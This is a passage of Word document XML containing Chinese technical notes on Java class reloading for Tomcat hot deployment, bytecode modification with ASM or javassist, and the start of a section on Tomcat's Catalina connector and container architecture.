        <w:t>你就不会再认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是使用一个新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>classloader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>来加载修改过的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>了，而且对于有状态的实例，之前该实例拥有的属性和状态都将保存，并在下次执行时拥有了新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的逻辑，这就是热部署的神秘之处（其实每个实例只是保存了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>该实例的状态属性，我们通过序列化对象就能看到对象中包含的状态，最终的逻辑还是存在于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>文件中）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB12A2" w:rsidRPr="00FB12A2" w:rsidRDefault="00FB12A2" w:rsidP="00FB12A2">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="68" w:after="68" w:line="353" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB12A2" w:rsidRPr="00FB12A2" w:rsidRDefault="00FB12A2" w:rsidP="00FB12A2">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="68" w:after="68" w:line="353" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>此方法在</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>redefineClasses</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>时或者初次加载时会被调用，也就是说在</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>被再次加载时会被调用，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB12A2" w:rsidRPr="00FB12A2" w:rsidRDefault="00FB12A2" w:rsidP="00FB12A2">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="68" w:after="68" w:line="353" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>并且我们通过此方法可以动态修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>字节码，实现类似代理之类的功能，具体方法可使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ASM</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>javasist</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB12A2" w:rsidRPr="00FB12A2" w:rsidRDefault="00FB12A2" w:rsidP="00FB12A2">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="68" w:after="68" w:line="353" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>如果对字节码很熟悉的话可以直接修改字节码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0081290D" w:rsidRDefault="00FB12A2" w:rsidP="00AC36AA">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="68" w:after="68" w:line="353" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB12A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="00F41A4C" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>第三章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Catalina主要包含两</w:t>
      </w:r>
      <w:r w:rsidRPr="00840E77">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>个模块:连接器(Connector)和容器(container)</w:t>
      </w:r>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Tomcat4不再使用默认的连接器了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>启动程序启动整个应用程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>org.apache.catalina.util： StringManager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>启动模块包含一个类(Bootstrap),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>连接器模块分为5个类:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(1)连接器(HttpConnector)及支持类(HttpProcessor)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(2)表示Http请求的HttpRequest及其支持类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(3)httpResponse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007364D4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(4)外观类(HttpRequestFacade以及HttpResponseFacade)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D866AF" w:rsidRPr="007364D4" w:rsidRDefault="00D866AF" w:rsidP="00D866AF">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
